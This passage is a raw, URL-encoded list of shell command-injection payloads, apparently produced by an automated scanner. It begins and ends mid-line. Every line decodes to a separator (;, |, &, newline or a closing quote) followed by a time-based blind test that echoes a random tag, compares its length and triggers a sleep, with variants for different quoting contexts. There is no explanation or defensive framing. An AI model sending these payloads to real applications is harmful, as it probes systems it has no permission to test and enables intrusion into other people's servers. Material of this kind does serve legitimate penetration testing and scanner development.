7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%7C%20%5B%209%20-ne%20%24%28echo%20SQHKCG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GZNGDE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GZNGDE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GZNGDE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GZNGDE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GZNGDE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GZNGDE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GZNGDE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GZNGDE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GZNGDE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%0A%20str%3D%24%28echo%20GRGSHX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%0A%20str%3D%24%28echo%20GRGSHX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%0A%20str%3D%24%28echo%20GRGSHX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%0A%20str%3D%24%28echo%20GRGSHX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%0A%20str%3D%24%28echo%20GRGSHX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%0A%20str%3D%24%28echo%20GRGSHX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%0A%20str%3D%24%28echo%20GRGSHX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%0A%20str%3D%24%28echo%20GRGSHX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%0A%20str%3D%24%28echo%20GRGSHX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%3B%20str%3D%24%28echo%20OKKNHF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%3B%20str%3D%24%28echo%20OKKNHF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%3B%20str%3D%24%28echo%20OKKNHF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%3B%20str%3D%24%28echo%20OKKNHF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%3B%20str%3D%24%28echo%20OKKNHF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%3B%20str%3D%24%28echo%20OKKNHF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%3B%20str%3D%24%28echo%20OKKNHF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%3B%20str%3D%24%28echo%20OKKNHF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%3B%20str%3D%24%28echo%20OKKNHF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%7C%20%5B%201%20-ne%20%24%28echo%20DAJIYU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%7C%20%5B%202%20-ne%20%24%28echo%20DAJIYU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%7C%20%5B%203%20-ne%20%24%28echo%20DAJIYU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%7C%20%5B%204%20-ne%20%24%28echo%20DAJIYU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%7C%20%5B%205%20-ne%20%24%28echo%20DAJIYU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%7C%20%5B%206%20-ne%20%24%28echo%20DAJIYU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%7C%20%5B%207%20-ne%20%24%28echo%20DAJIYU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%7C%20%5B%208%20-ne%20%24%28echo%20DAJIYU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%7C%20%5B%209%20-ne%20%24%28echo%20DAJIYU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IYHUSO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IYHUSO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IYHUSO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IYHUSO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IYHUSO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IYHUSO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IYHUSO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IYHUSO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IYHUSO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%0A%20str%3D%24%28echo%20VILFSX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%0A%20str%3D%24%28echo%20VILFSX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%0A%20str%3D%24%28echo%20VILFSX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%0A%20str%3D%24%28echo%20VILFSX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%0A%20str%3D%24%28echo%20VILFSX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%0A%20str%3D%24%28echo%20VILFSX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%0A%20str%3D%24%28echo%20VILFSX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%0A%20str%3D%24%28echo%20VILFSX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%0A%20str%3D%24%28echo%20VILFSX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%3B%20str%3D%24%28echo%20OLJBSU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%3B%20str%3D%24%28echo%20OLJBSU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%3B%20str%3D%24%28echo%20OLJBSU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%3B%20str%3D%24%28echo%20OLJBSU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%3B%20str%3D%24%28echo%20OLJBSU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%3B%20str%3D%24%28echo%20OLJBSU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%3B%20str%3D%24%28echo%20OLJBSU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%3B%20str%3D%24%28echo%20OLJBSU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%3B%20str%3D%24%28echo%20OLJBSU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%7C%20%5B%201%20-ne%20%24%28echo%20WXFPFO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%7C%20%5B%202%20-ne%20%24%28echo%20WXFPFO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%7C%20%5B%203%20-ne%20%24%28echo%20WXFPFO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%7C%20%5B%204%20-ne%20%24%28echo%20WXFPFO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%7C%20%5B%205%20-ne%20%24%28echo%20WXFPFO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%7C%20%5B%206%20-ne%20%24%28echo%20WXFPFO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%7C%20%5B%207%20-ne%20%24%28echo%20WXFPFO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%7C%20%5B%208%20-ne%20%24%28echo%20WXFPFO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%7C%20%5B%209%20-ne%20%24%28echo%20WXFPFO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JHKWGE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JHKWGE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JHKWGE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JHKWGE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JHKWGE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JHKWGE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JHKWGE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JHKWGE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JHKWGE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%0A%20str%3D%24%28echo%20TYPSKV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%0A%20str%3D%24%28echo%20TYPSKV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%0A%20str%3D%24%28echo%20TYPSKV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%0A%20str%3D%24%28echo%20TYPSKV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%0A%20str%3D%24%28echo%20TYPSKV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%0A%20str%3D%24%28echo%20TYPSKV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%0A%20str%3D%24%28echo%20TYPSKV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%0A%20str%3D%24%28echo%20TYPSKV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%0A%20str%3D%24%28echo%20TYPSKV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%3B%20str%3D%24%28echo%20VGHMVB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%3B%20str%3D%24%28echo%20VGHMVB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%3B%20str%3D%24%28echo%20VGHMVB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%3B%20str%3D%24%28echo%20VGHMVB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%3B%20str%3D%24%28echo%20VGHMVB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%3B%20str%3D%24%28echo%20VGHMVB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%3B%20str%3D%24%28echo%20VGHMVB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%3B%20str%3D%24%28echo%20VGHMVB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%3B%20str%3D%24%28echo%20VGHMVB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%7C%20%5B%201%20-ne%20%24%28echo%20WIGALP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%7C%20%5B%202%20-ne%20%24%28echo%20WIGALP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%7C%20%5B%203%20-ne%20%24%28echo%20WIGALP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%7C%20%5B%204%20-ne%20%24%28echo%20WIGALP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%7C%20%5B%205%20-ne%20%24%28echo%20WIGALP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%7C%20%5B%206%20-ne%20%24%28echo%20WIGALP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%7C%20%5B%207%20-ne%20%24%28echo%20WIGALP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%7C%20%5B%208%20-ne%20%24%28echo%20WIGALP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%7C%20%5B%209%20-ne%20%24%28echo%20WIGALP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QHSDUY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QHSDUY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QHSDUY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QHSDUY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QHSDUY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QHSDUY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QHSDUY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QHSDUY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QHSDUY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%0A%20str%3D%24%28echo%20JADKKF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%0A%20str%3D%24%28echo%20JADKKF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%0A%20str%3D%24%28echo%20JADKKF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%0A%20str%3D%24%28echo%20JADKKF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%0A%20str%3D%24%28echo%20JADKKF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%0A%20str%3D%24%28echo%20JADKKF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%0A%20str%3D%24%28echo%20JADKKF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%0A%20str%3D%24%28echo%20JADKKF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%0A%20str%3D%24%28echo%20JADKKF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%3B%20str%3D%24%28echo%20UOMPHD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%3B%20str%3D%24%28echo%20UOMPHD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%3B%20str%3D%24%28echo%20UOMPHD%29%3B%20str1%3D%24%7B%23st